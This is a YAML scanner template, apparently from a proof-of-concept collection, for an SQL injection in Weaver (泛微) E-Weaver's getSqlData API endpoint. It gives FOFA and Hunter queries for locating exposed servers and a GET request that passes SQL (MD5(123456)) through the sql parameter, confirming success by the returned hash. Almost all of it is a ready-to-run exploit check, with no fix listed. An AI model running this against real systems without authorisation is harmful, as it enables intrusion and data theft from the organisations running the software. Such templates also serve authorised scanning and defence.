product: 泛微 E-Weaver
vName: 泛微E-Weaver SQL注入getSqlData
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微 E-Weaver SQL注入getSqlData
version: ''
note: ''
search:
  FOFA: app="泛微-E-Weaver"
  Hunter: app.name="泛微 e-Weaver"
protocol: http
link: https://blog.csdn.net/u010025272/article/details/134486197
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /Api/portal/elementEcodeAddon/getSqlData?sql=MD5(123456)
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and